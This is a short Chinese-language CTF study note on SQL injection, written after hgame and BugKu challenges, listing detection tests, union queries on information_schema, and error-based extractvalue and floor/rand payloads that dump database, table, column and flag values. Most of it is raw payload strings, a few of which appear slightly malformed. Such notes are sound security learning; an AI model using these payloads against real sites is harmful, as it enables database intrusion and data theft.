SQL注入
hgame两道sql题都不算太难,有验证不过没过滤,再次响起招新被时间盲注支配的恐惧~,整理一下大致的框架,
数字型和字符型
按查询的数据类型可以分为数字和字符型
判断方式:
?id=1 and 1=1返回正确则是数字型
?id=1’and’1’=’2返回正确则是字符型
有回显的注入:联合查询
查询语句
- 表名
select column_name from information_schema.tables where table_schema =database() limit 0,1
- 列名
select column_name from information_schema.columns where table_name='表名' limit 0,1
- 内容
SELECT concat(username,0x3a,0x7e) FROM 列名 limit 3,1
盲注:
布尔盲注
时间盲注
基于报错型的盲注
extractvalue/updatexml型注入
'&& extractvalue(1,concat(0x7e,(select database()),0x7e))#%27%26%26%0aextractvalue(1,concat(0x7e,(select database()),0x7e))%231'%26%26 1=extractvalue(1,database())%23
双注入公式
select count(*),concat((select database()), floor(rand()*2))as a from information_schema.tables group by a;
floor报错注入
- 爆数据库
1'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,* ,0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+&code=uoEJ - 爆表
1'and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+ - 爆列
1'and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,) FROM information_schema.columns where table_name='fl444g' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+ - 爆字段
1'and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,fl444g_is_here,0x3a,0x23) FROM fl444g limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
注意
编码问题
注意空格,前面的select &&%0aselect
limit 0,1从第0个开始取一个。
sql约束攻击
BugKu login1
题目hint里给了是基于约束的sql攻击,搜索了一下,